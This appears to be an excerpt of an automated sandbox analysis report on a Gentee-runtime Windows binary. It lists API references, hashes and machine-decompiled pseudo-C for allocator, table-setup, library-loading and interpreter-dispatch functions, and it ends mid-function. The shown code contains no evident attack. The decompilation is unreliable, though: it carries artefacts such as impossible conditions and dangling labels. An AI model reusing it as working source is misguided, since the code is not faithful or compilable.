                                                                    • lstrlenA.KERNEL32(?,?,00000000,?,?,004019D8,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 004016D9
                                                                    • lstrlenA.KERNEL32(?,?,00000000,?,?,004019D8,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 004016E3
                                                                    • wsprintfA.USER32 ref: 004016F5
                                                                    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,004019D8,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 004016FF
                                                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000,?,?,?,?,?,004019D8,00000000,00000000,?), ref: 0040171A
                                                                    • lstrcpyA.KERNEL32(?,c:\temp,?,?,?,?,?,004019D8,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 00401739
                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?,?,004019D8,00000000,00000000,?,?,-00000400,?,?,00000000), ref: 00401741
                                                                    • wsprintfA.USER32 ref: 00401753
                                                                    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,004019D8,00000000,00000000,?,?,-00000400), ref: 0040175D
                                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,004019D8,00000000), ref: 004017D7
                                                                    • FindCloseChangeNotification.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,004019D8,00000000,00000000), ref: 004017EC
                                                                    • lstrcpyA.KERNEL32(?,Cannot create gentee.dll!,?,?,00000000,?,?,?,?,?,?,?,?,?,004019D8,00000000), ref: 004017FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.322893653.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.322884038.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322913999.0000000000402000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322924635.0000000000403000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.322942646.0000000000404000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: File$AttributesCreatelstrcpylstrlenwsprintf$ChangeCloseDirectoryFindNotificationPathTempWrite
                                                                    • String ID: %s\genteert.dll$Cannot create gentee.dll!$I$c:\temp
                                                                    • API String ID: 2456730274-3024849923
                                                                    • Opcode ID: 8a3f478474cb178c0db6a781311e9bbebcfb1379b92b38a38e3dc45cd2d4445c
                                                                    • Instruction ID: 67627f2e786aaddb3fd4ed1d4e819a884a497af34afd47e88a40c4d4d8adc77f
                                                                    • Opcode Fuzzy Hash: 8a3f478474cb178c0db6a781311e9bbebcfb1379b92b38a38e3dc45cd2d4445c
                                                                    • Instruction Fuzzy Hash: 2A41D471204300ABE210AB61DE88F6B7B68EB85715F10443AF701B32E1CBB9A805D779
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10003C00, Relevance: 6.1, APIs: 4, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 98%
                                                                    			E10003C00() {
				void* _t23;
				signed int _t24;
				void* _t25;
				void* _t26;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				CHAR* _t33;
				intOrPtr _t34;
				void* _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t43;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t49;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				intOrPtr _t59;
				signed int _t64;
				CHAR* _t65;

				_t64 = 8;
				_t23 = malloc(0x400);
				 *0x1000d308 = _t23;
				 *_t23 = 8;
				_t24 = 1;
				do {
					if((_t24 & 0x0000000f) == 0) {
						_t64 = _t64 << 1;
					}
					_t43 =  *0x1000d308; // 0x2320da8
					 *((intOrPtr*)(_t43 + _t24 * 4)) =  *((intOrPtr*)(_t43 + _t24 * 4 - 4)) + _t64;
					_t24 = _t24 + 1;
				} while (_t24 < 0xff);
				_t25 =  *0x1000d308; // 0x2320da8
				 *((intOrPtr*)(_t25 + 0x3fc)) = 0xffffffff;
				_t26 = malloc(0x1400); // executed
				 *0x1000d300 = _t26;
				E10003E70(_t26, 0x1400);
				InitializeCriticalSection(0x1000d2e0);
				_push(0x500);
				 *0x1000d304 = 0;
				_t28 = E10003980();
				 *0x1000d2f8 = _t28;
				_t29 = _t28 + 0x100;
				 *0x1000d2c8 = _t29;
				_t30 = _t29 + 0x100;
				 *0x1000d2cc = _t30;
				_t31 = _t30 + 0x100;
				 *0x1000d2d0 = _t31;
				 *0x1000d2d4 = _t31 + 0x100;
				_t65 = 0;
				do {
					_t33 = CharLowerA(_t65);
					_t44 =  *0x1000d2f8; // 0x2160446
					 *(_t44 + _t65) = _t33;
					_t52 =  *0x1000d2c8; // 0x2160546
					 *((char*)(_t52 + _t65)) = 0xff;
					if(_t65 < 0x30 || _t65 > 0x39) {
						if(_t65 >= 0x80 || _t65 >= 0x41 && _t65 <= 0x5a || _t65 >= 0x61 && _t65 <= 0x7a || _t65 == 0x5f) {
							_t53 =  *0x1000d2d4; // 0x2160846
							 *((char*)(_t53 + _t65)) = 2;
						} else {
							_t49 =  *0x1000d2d4; // 0x2160846
							 *((char*)(_t49 + _t65)) = 0;
						}
					} else {
						_t42 =  *0x1000d2d4; // 0x2160846
						 *((char*)(_t42 + _t65)) = 1;
					}
					_t65 =  &(_t65[1]);
				} while (_t65 < 0x100);
				_t34 =  *0x1000d2c8; // 0x2160546
				 *((char*)(_t34 + 0x30)) = 0;
				_t45 =  *0x1000d2c8; // 0x2160546
				_t35 = 0;
				 *((char*)(_t45 + 0x31)) = 1;
				do {
					if(_t35 <= 0x31 || _t35 > 0x39) {
						_t54 =  *0x1000d2c8; // 0x2160546
						_t55 =  *0x1000d2cc; // 0x2160646
						 *((char*)(_t55 + _t35)) =  *((intOrPtr*)(_t54 + _t35));
					} else {
						_t47 =  *0x1000d2cc; // 0x2160646
						 *((char*)(_t47 + _t35)) = _t35 - 0x30;
					}
					_t35 = _t35 + 1;
				} while (_t35 < 0x100);
				_t48 = 0;
				do {
					_t36 =  *0x1000d2f8; // 0x2160446
					_t37 =  *((intOrPtr*)(_t36 + _t48));
					if(_t37 < 0x61 || _t37 > 0x66) {
						_t38 =  *0x1000d2cc; // 0x2160646
						_t39 =  *0x1000d2d0; // 0x2160746
						 *((char*)(_t39 + _t48)) =  *((intOrPtr*)(_t38 + _t48));
					} else {
						_t59 =  *0x1000d2d0; // 0x2160746
						 *((char*)(_t59 + _t48)) = _t37 - 0x57;
					}
					_t48 = _t48 + 1;
				} while (_t48 < 0x100);
				return 1;
			}
































                                                                    0x10003c07
                                                                    0x10003c0c
                                                                    0x10003c11
                                                                    0x10003c16
                                                                    0x10003c1b
                                                                    0x10003c20
                                                                    0x10003c22
                                                                    0x10003c24
                                                                    0x10003c24
                                                                    0x10003c26
                                                                    0x10003c32
                                                                    0x10003c35
                                                                    0x10003c36
                                                                    0x10003c3d
                                                                    0x10003c47
                                                                    0x10003c51
                                                                    0x10003c59
                                                                    0x10003c64
                                                                    0x10003c6e
                                                                    0x10003c74
                                                                    0x10003c79
                                                                    0x10003c83
                                                                    0x10003c88
                                                                    0x10003c8d
                                                                    0x10003c92
                                                                    0x10003c97
                                                                    0x10003ca2
                                                                    0x10003ca7
                                                                    0x10003cac
                                                                    0x10003cb6
                                                                    0x10003cbb
                                                                    0x10003cbd
                                                                    0x10003cbe
                                                                    0x10003cc0
                                                                    0x10003cc9
                                                                    0x10003ccc
                                                                    0x10003cd2
                                                                    0x10003cd6
                                                                    0x10003cee
                                                                    0x10003d15
                                                                    0x10003d1b
                                                                    0x10003d09
                                                                    0x10003d09
                                                                    0x10003d0f
                                                                    0x10003d0f
                                                                    0x10003cdd
                                                                    0x10003cdd
                                                                    0x10003ce2
                                                                    0x10003ce2
                                                                    0x10003d1f
                                                                    0x10003d20
                                                                    0x10003d28
                                                                    0x10003d2f
                                                                    0x10003d33
                                                                    0x10003d39
                                                                    0x10003d3b
                                                                    0x10003d3f
                                                                    0x10003d42
                                                                    0x10003d59
                                                                    0x10003d62
                                                                    0x10003d68
                                                                    0x10003d49
                                                                    0x10003d49
                                                                    0x10003d54
                                                                    0x10003d54
                                                                    0x10003d6b
                                                                    0x10003d6c
                                                                    0x10003d73
                                                                    0x10003d75
                                                                    0x10003d75
                                                                    0x10003d7a
                                                                    0x10003d7f
                                                                    0x10003d92
                                                                    0x10003d9a
                                                                    0x10003d9f
                                                                    0x10003d85
                                                                    0x10003d85
                                                                    0x10003d8d
                                                                    0x10003d8d
                                                                    0x10003da2
                                                                    0x10003da3
                                                                    0x10003db0

                                                                    APIs
                                                                    • malloc.MSVCRT ref: 10003C0C
                                                                    • malloc.MSVCRT ref: 10003C51
                                                                    • InitializeCriticalSection.KERNEL32(1000D2E0,00000000,00001400,00001400), ref: 10003C6E
                                                                    • CharLowerA.USER32(00000000,00000500), ref: 10003CBE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: malloc$CharCriticalInitializeLowerSection
                                                                    • String ID:
                                                                    • API String ID: 1963527391-0
                                                                    • Opcode ID: 2fea42c86315bfe1481c1987a6753dc238810363eafcdcdaa48903890fab695d
                                                                    • Instruction ID: 51651d1a03007351202afa30bb3bb704e0063df465590a1688396c568ca457f4
                                                                    • Opcode Fuzzy Hash: 2fea42c86315bfe1481c1987a6753dc238810363eafcdcdaa48903890fab695d
                                                                    • Instruction Fuzzy Hash: F941CA359042618FF312EB18D8D4B8EBBA6E7563D4F15816BC5918B3BEC275CC82C7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10003980, Relevance: 5.1, APIs: 4, Instructions: 86COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E10003980() {
				signed int _t31;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				signed int _t40;
				intOrPtr _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				signed int _t49;
				intOrPtr _t50;
				signed int _t53;
				signed int* _t55;
				signed int* _t56;
				void* _t57;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t63;

				EnterCriticalSection(0x1000d2e0);
				_t59 =  *(_t63 + 0x14);
				if(_t59 <= 0xffff) {
					_t31 = E10003950(_t59);
					_t41 =  *0x1000d308; // 0x2320da8
					_t40 =  *0x1000d304; // 0x2
					 *(_t63 + 0x14) = _t31;
					_t62 =  *((intOrPtr*)(_t41 + _t31 * 4)) + 2;
					_t53 = 0;
					__eflags = 0;
					while(1) {
						_t42 =  *0x1000d300; // 0x23223f0
						_t49 = _t40 + _t40 * 4;
						_t60 = _t42 + _t49 * 4;
						__eflags =  *((intOrPtr*)(_t42 + _t49 * 4)) - _t53;
						if( *((intOrPtr*)(_t42 + _t49 * 4)) != _t53) {
							goto L6;
						}
						_t36 = E100038C0(_t40);
						__eflags = _t36;
						if(_t36 != 0) {
							_t31 =  *(_t63 + 0x14);
							goto L6;
						}
						L14:
						LeaveCriticalSection(0x1000d2e0);
						return _t53;
						goto L15;
						L6:
						_t14 = _t60 + 4; // 0x89e43074
						_t50 =  *_t14;
						__eflags =  *((intOrPtr*)(_t50 + _t31 * 4)) - _t53;
						if( *((intOrPtr*)(_t50 + _t31 * 4)) != _t53) {
							_t18 = _t60 + 0x10; // 0x5d89e445
							 *((intOrPtr*)(_t60 + 0x10)) =  *_t18 - _t62;
							_t20 = _t60 + 4; // 0x89e43074
							_t46 =  *_t20;
							_t53 =  *(_t46 + _t31 * 4);
							 *(_t46 + _t31 * 4) =  *_t53;
							goto L13;
						} else {
							_t17 = _t60 + 0xc; // 0x8d0689f4
							__eflags = _t62 -  *_t17;
							if(_t62 <=  *_t17) {
								_t25 = _t60 + 8; // 0x7589ec45
								_t26 = _t60 + 0xc; // 0x8d0689f4
								_t28 =  *_t60 + 0x3fc; // 0x7589f041
								_t55 =  *_t25 -  *_t26 + _t28;
								 *_t55 = _t40;
								_t56 =  &(_t55[0]);
								 *_t56 = _t31;
								_t29 = _t60 + 0xc; // 0x8d0689f4
								_t53 =  &(_t56[0]);
								_t35 =  *_t29 - _t62;
								__eflags = _t35;
								 *((intOrPtr*)(_t60 + 0xc)) = _t35;
								L13:
								 *0x1000d304 = _t40;
							} else {
								__eflags =  *0x1000d304 - _t53; // 0x2
								if(__eflags == 0) {
									_t40 = _t40 + 1;
								} else {
									 *0x1000d304 = _t53;
									_t40 = 0;
								}
								continue;
							}
						}
						goto L14;
					}
				} else {
					_t2 = _t59 + 6; // 0x100021f8
					_t38 = malloc(_t2); // executed
					_t57 = _t38;
					 *((char*)(_t57 + 5)) = 0xff;
					 *_t57 = _t59;
					LeaveCriticalSection(0x1000d2e0);
					return _t57 + 6;
				}
				L15:
			}





















                                                                    0x10003989
                                                                    0x1000398f
                                                                    0x10003999
                                                                    0x100039c7
                                                                    0x100039cc
                                                                    0x100039d2
                                                                    0x100039d8
                                                                    0x100039df
                                                                    0x100039e2
                                                                    0x100039e2
                                                                    0x100039e4
                                                                    0x100039e4
                                                                    0x100039ea
                                                                    0x100039ed
                                                                    0x100039f3
                                                                    0x100039f5
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x100039f8
                                                                    0x100039fd
                                                                    0x100039ff
                                                                    0x10003a01
                                                                    0x00000000
                                                                    0x10003a01
                                                                    0x10003a63
                                                                    0x10003a68
                                                                    0x10003a74
                                                                    0x00000000
                                                                    0x10003a05
                                                                    0x10003a05
                                                                    0x10003a05
                                                                    0x10003a08
                                                                    0x10003a0b
                                                                    0x10003a27
                                                                    0x10003a2c
                                                                    0x10003a2f
                                                                    0x10003a2f
                                                                    0x10003a32
                                                                    0x10003a3a
                                                                    0x00000000
                                                                    0x10003a0d
                                                                    0x10003a0d
                                                                    0x10003a0d
                                                                    0x10003a10
                                                                    0x10003a3e
                                                                    0x10003a41
                                                                    0x10003a48
                                                                    0x10003a48
                                                                    0x10003a4f
                                                                    0x10003a51
                                                                    0x10003a52
                                                                    0x10003a54
                                                                    0x10003a57
                                                                    0x10003a58
                                                                    0x10003a58
                                                                    0x10003a5a
                                                                    0x10003a5d
                                                                    0x10003a5d
                                                                    0x10003a12
                                                                    0x10003a12
                                                                    0x10003a18
                                                                    0x10003a24
                                                                    0x10003a1a
                                                                    0x10003a1a
                                                                    0x10003a20
                                                                    0x10003a20
                                                                    0x00000000
                                                                    0x10003a18
                                                                    0x10003a10
                                                                    0x00000000
                                                                    0x10003a0b
                                                                    0x1000399b
                                                                    0x1000399b
                                                                    0x1000399f
                                                                    0x100039a7
                                                                    0x100039a9
                                                                    0x100039ad
                                                                    0x100039b7
                                                                    0x100039c3
                                                                    0x100039c3
                                                                    0x00000000

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(1000D2E0,?,00008000,?,?,100021F2,00008000,?,?,?,?,?,10002D96,?,00008000,?), ref: 10003989
                                                                    • malloc.MSVCRT ref: 1000399F
                                                                    • LeaveCriticalSection.KERNEL32(1000D2E0,?,?,?,10002D96,?,00008000,?,00008000), ref: 100039B7
                                                                    • LeaveCriticalSection.KERNEL32(1000D2E0,100021F2,?,00008000,?,?,100021F2,00008000,?,?,?,?,?,10002D96,?,00008000), ref: 10003A68
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Entermalloc
                                                                    • String ID:
                                                                    • API String ID: 3130977980-0
                                                                    • Opcode ID: 84fdffb65d4ef5215195cbda2d5d2bc33cc19ca858326295f9bce40fb6ff787b
                                                                    • Instruction ID: d25bee814d14efda30f1464362f07031c0896e54ac39c5d7f6b7dd260b70e25f
                                                                    • Opcode Fuzzy Hash: 84fdffb65d4ef5215195cbda2d5d2bc33cc19ca858326295f9bce40fb6ff787b
                                                                    • Instruction Fuzzy Hash: C831C275600302CFE321DF19C89085BBBE9FF863D0324812EE69543709C731B906CB62
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10003B40, Relevance: 5.0, APIs: 4, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E10003B40(intOrPtr* _a4) {
				intOrPtr _t28;
				intOrPtr* _t32;
				intOrPtr* _t35;

				_t35 = _a4;
				if(_t35 == 0) {
					L4:
					return 1;
				} else {
					EnterCriticalSection(0x1000d2e0);
					if(0 != 0xff) {
						_t28 =  *0x1000d300; // 0x23223f0
						 *_t35 =  *((intOrPtr*)( *((intOrPtr*)(4))));
						 *((intOrPtr*)( *((intOrPtr*)(4)))) = _t35;
						_t32 =  *0x1000d308; // 0x2320da8
						 *((intOrPtr*)(_t28 + 0x10)) =  *((intOrPtr*)(0x10)) +  *_t32 + 2;
						LeaveCriticalSection(0x1000d2e0);
						goto L4;
					} else {
						free(_t35 + 0xfffffffa); // executed
						LeaveCriticalSection(0x1000d2e0);
						return 1;
					}
				}
			}






                                                                    0x10003b41
                                                                    0x10003b47
                                                                    0x10003bbf
                                                                    0x10003bc5
                                                                    0x10003b49
                                                                    0x10003b4e
                                                                    0x10003b64
                                                                    0x10003b86
                                                                    0x10003b9d
                                                                    0x10003ba2
                                                                    0x10003ba5
                                                                    0x10003bb6
                                                                    0x10003bb9
                                                                    0x00000000
                                                                    0x10003b66
                                                                    0x10003b6a
                                                                    0x10003b77
                                                                    0x10003b83
                                                                    0x10003b83
                                                                    0x10003b64

                                                                    APIs
                                                                    • EnterCriticalSection.KERNEL32(1000D2E0,?,1000343D,10002DB8,?,100069F9,?,-00000001,?,?,1000516B,1000D240,1000D240,?,10002DB8), ref: 10003B4E
                                                                    • free.MSVCRT(?,?,100069F9,?,-00000001,?,?,1000516B,1000D240,1000D240,?,10002DB8), ref: 10003B6A
                                                                    • LeaveCriticalSection.KERNEL32(1000D2E0,10002DB8), ref: 10003B77
                                                                    • LeaveCriticalSection.KERNEL32(1000D2E0,?,100069F9,?,-00000001,?,?,1000516B,1000D240,1000D240,?,10002DB8), ref: 10003BB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CriticalSection$Leave$Enterfree
                                                                    • String ID:
                                                                    • API String ID: 3634772007-0
                                                                    • Opcode ID: ef82aced2ef61d46468018d6ff9b6c43efccf280279c7c0ea65ebc34c90fa554
                                                                    • Instruction ID: 846816d5a6104c22fdc160fc1011475c9e8aa1a9bd04d901e8fdfeab3ad9ac32
                                                                    • Opcode Fuzzy Hash: ef82aced2ef61d46468018d6ff9b6c43efccf280279c7c0ea65ebc34c90fa554
                                                                    • Instruction Fuzzy Hash: 5301F7B55001118FE314DF18C890EDABBE4FF5A390706C2AAE9418731EC771D982CBE0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10005600, Relevance: 3.1, APIs: 2, Instructions: 94libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 66%
                                                                    			E10005600(void* __ebx, void* __edi, void* __eflags) {
				intOrPtr _v4;
				char _v16;
				char _v20;
				char _v24;
				CHAR* _v32;
				void* _v40;
				void* __esi;
				signed char _t32;
				signed int _t36;
				struct HINSTANCE__* _t37;
				void* _t48;
				void* _t66;
				intOrPtr _t68;
				void* _t69;
				CHAR** _t70;

				_t52 = __ebx;
				_t70 =  &_v32;
				E10004BF0(__eflags, _t70);
				E10004BF0(__eflags,  &_v20);
				_t68 = _v4;
				E10004AA0( &_v24,  *((intOrPtr*)(_t68 + 0x15)));
				_t32 =  *(_t68 + 5);
				_t73 = _t32 & 0x00000001;
				if((_t32 & 0x00000001) == 0) {
					__eflags = _t32 & 0x00000004;
					if(__eflags == 0) {
						E100033F0( &_v32,  &_v16);
					} else {
						E10006570(__ebx, __eflags,  &_v32,  &_v16);
					}
				} else {
					E10006500(__ebx, __edi, _t69, _t73,  &_v32,  &_v16);
					if( *((intOrPtr*)(_t68 + 0x19)) != 0) {
						_push(__edi);
						_t66 = E10005AF0( &_v32, 6);
						_t75 = _t66;
						if(_t66 == 0) {
							_push( &_v32);
							_push(0x30007);
							E100040A0(__ebx,  &_v32, _t66, _t68, _t75);
							_t70 =  &(_t70[2]);
						}
						_t48 = E10005BC0(_t66,  *((intOrPtr*)(_t68 + 0x1d)),  *((intOrPtr*)(_t68 + 0x19)));
						_t76 = _t48;
						if(_t48 == 0) {
							_push( &_v32);
							_push(0x30009);
							E100040A0(_t52,  &_v32, _t66, _t68, _t76);
						}
						E10005A90(_t66);
					}
				}
				if(E10004D00( &_v32) == 0) {
					_t36 =  *0x1000d34c; // 0x401890
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 = GetModuleHandleA(0);
					} else {
						_t37 = _t36 | 0xffffffff;
					}
				} else {
					_t37 = LoadLibraryA(_v32); // executed
				}
				 *(_t68 + 0x21) = _t37;
				E10003430( &_v32);
				return E10003430( &_v20);
			}


















                                                                    0x10005600
                                                                    0x10005600
                                                                    0x10005609
                                                                    0x10005613
                                                                    0x1000561c
                                                                    0x10005625
                                                                    0x1000562a
                                                                    0x1000562d
                                                                    0x10005630
                                                                    0x1000569a
                                                                    0x1000569d
                                                                    0x100056ba
                                                                    0x1000569f
                                                                    0x100056a9
                                                                    0x100056a9
                                                                    0x10005632
                                                                    0x1000563c
                                                                    0x10005646
                                                                    0x10005648
                                                                    0x10005655
                                                                    0x10005657
                                                                    0x10005659
                                                                    0x1000565f
                                                                    0x10005660
                                                                    0x10005665
                                                                    0x1000566a
                                                                    0x1000566a
                                                                    0x10005676
                                                                    0x1000567b
                                                                    0x1000567d
                                                                    0x10005683
                                                                    0x10005684
                                                                    0x10005689
                                                                    0x1000568e
                                                                    0x10005692
                                                                    0x10005697
                                                                    0x10005646
                                                                    0x100056cb
                                                                    0x100056da
                                                                    0x100056df
                                                                    0x100056e1
                                                                    0x100056ea
                                                                    0x100056e3
                                                                    0x100056e3
                                                                    0x100056e3
                                                                    0x100056cd
                                                                    0x100056d2
                                                                    0x100056d2
                                                                    0x100056f4
                                                                    0x100056f8
                                                                    0x1000570b

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 100056D2
                                                                      • Part of subcall function 10005AF0: CreateFileA.KERNEL32(1000D329,1000D32C,1000D329,00000000,1000D329,00000000,00000000,10005CC3,1000D32C,00000006,1000D32C,00000000,00000000,?,1000D32C,10006518), ref: 10005B34
                                                                    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 100056EA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.327962858.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.327957654.0000000010000000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327972112.000000001000A000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327977394.000000001000C000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000000.00000002.327982740.000000001000E000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFileHandleLibraryLoadModule
                                                                    • String ID:
                                                                    • API String ID: 3230317097-0
                                                                    • Opcode ID: e231578acc43963604cd00fc2ab4634b14236b7c52a40841d6216e3b0cf3b7aa
                                                                    • Instruction ID: 217a19c331d329f0d3a28da38208d12c731110efd849884d42853dc6c258a9ef
                                                                    • Opcode Fuzzy Hash: e231578acc43963604cd00fc2ab4634b14236b7c52a40841d6216e3b0cf3b7aa
                                                                    • Instruction Fuzzy Hash: 74315EB9514302AAF214DF60DD85E6B73ECEF846C1F808A1CF94597149EB76F9088732
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 10002A73, Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 66%
                                                                    			E10002A73(signed int __edi, void* __esi, long long __fp0) {
				signed int __ebx;
				signed int _t409;
				signed int _t410;
				intOrPtr _t415;
				signed int _t418;
				signed int _t435;
				signed int _t436;
				intOrPtr _t446;
				void* _t458;
				void* _t460;
				signed int _t462;
				long long _t470;

				L0:
				while(1) {
					L0:
					_t470 = __fp0;
					_t458 = __esi;
					_t456 = __edi;
					_t409 =  *(__edi + 0x20);
					 *(_t460 + 0xc) = _t409;
					if(_t409 == 0) {
						__ecx =  *(__edi + 9);
						E100040A0(__ebx, __ecx, __edi, __esi, __eflags, 0x302000c, __ecx, __ebx);
					}
					_t439 =  *(_t456 + 0x1f);
					_t435 =  *(_t458 + 8);
					_t410 = 0;
					__eflags =  *(_t456 + 0x1f);
					if( *(_t456 + 0x1f) <= 0) {
						goto L137;
					} else {
						goto L136;
					}
					do {
						L136:
						_t446 =  *(_t435 - 4);
						_t435 = _t435 - 4;
						 *((intOrPtr*)(_t460 + 8)) = _t446;
						_push( *((intOrPtr*)(_t460 + 8)));
						_t410 = _t410 + 1;
						_t439 =  *(_t456 + 0x1f);
						__eflags = _t410;
					} while (_t410 < 0);
					L137:
					__eflags =  *(_t456 + 5) & 0x00020000;
					if(( *(_t456 + 5) & 0x00020000) == 0) {
						 *((intOrPtr*)(_t460 + 8)) = RegQueryValueExW();
						 *((intOrPtr*)(_t460 - 4)) = _t446;
					} else {
						__eflags =  *(_t456 + 0x19) - 1;
						if( *(_t456 + 0x19) != 1) {
							 *(_t460 + 0xc)();
							 *((long long*)(_t460 - 0x24)) = _t470;
							 *((intOrPtr*)(_t460 + 8)) =  *((intOrPtr*)(_t460 - 0x24));
							 *((intOrPtr*)(_t460 - 4)) =  *((intOrPtr*)(_t460 - 0x20));
						} else {
							 *(_t460 + 0xc)();
							 *((intOrPtr*)(_t460 + 8)) = _t470;
						}
					}
					__eflags =  *(_t456 + 5) & 0x00010000;
					if(( *(_t456 + 5) & 0x00010000) != 0) {
						_t439 = 0 << 2;
						 *(_t460 + 0xc) = 0 << 2;
						_t462 = _t462 +  *(_t460 + 0xc);
						__eflags = _t462;
					}
					__eflags =  *(_t456 + 0x19);
					if( *(_t456 + 0x19) != 0) {
						 *_t435 =  *((intOrPtr*)(_t460 + 8));
						_t435 = _t435 + 4;
						__eflags = _t435;
					}
					__eflags =  *(_t456 + 0x19) - 2;
					if(__eflags == 0) {
						 *_t435 =  *((intOrPtr*)(_t460 - 4));
						_t435 = _t435 + 4;
						__eflags = _t435;
					}
					L148:
					 *(_t458 + 8) = _t435;
					 *(_t458 + 4) =  &(( *(_t458 + 4))[1]);
					while(1) {
						L1:
						_t415 =  *0x1000d284; // 0x7e0
						_t436 =  *( *(_t458 + 4));
						 *(_t460 + 0xc) = _t436;
						if(_t436 >= _t415) {
							break;
						} else {
							goto L2;
						}
						while(1) {
							L2:
							_t418 =  *0x1000d240; // 0x2167528
							_t456 =  *(_t418 + _t436 * 4);
							 *(_t460 - 8) =  *(_t418 + _t436 * 4);
							if(0xffffffffffffffff > 4) {
								goto L150;
							}
							L3:
							switch( *((intOrPtr*)(0xfffffffffffffffc +  &M10002B94))) {
								case 0:
									L4:
									_t456 =  *(_t458 + 8);
									_t422 =  *(_t460 + 0xc) - 0x13;
									if(_t422 > 0x49) {
										goto L124;
									} else {
										L5:
										switch( *((intOrPtr*)(_t422 * 4 +  &M10002BA8))) {
											case 0:
												L7:
												__edx = __esi[5];
												__esi[2] = __esi[5];
												goto L8;
											case 1:
												L8:
												__eax = __esi[1];
												__edx = __esi[4];
												__ecx =  *(__esi[1] + 4);
												__eax =  *(__edx + 0x20);
												__ecx =  *(__edx + 0x20) +  *(__esi[1] + 4) * 4 - 8;
												__esi[1] = __ecx;
												goto L124;
											case 2:
												L9:
												__edx = __esi[5];
												__esi[2] = __edx;
												goto L10;
											case 3:
												L10:
												__eflags = __ecx;
												if(__eflags != 0) {
													goto L124;
												} else {
													goto L11;
												}
												goto L1;
											case 4:
												L12:
												__edx = __esi[5];
												__esi[2] = __edx;
												goto L13;
											case 5:
												L13:
												__eflags = __ecx;
												if(__eflags == 0) {
													goto L124;
												} else {
													L14:
													goto L11;
												}
												goto L1;
											case 6:
												goto L124;
											case 7:
												L15:
												__edx = __esi[1];
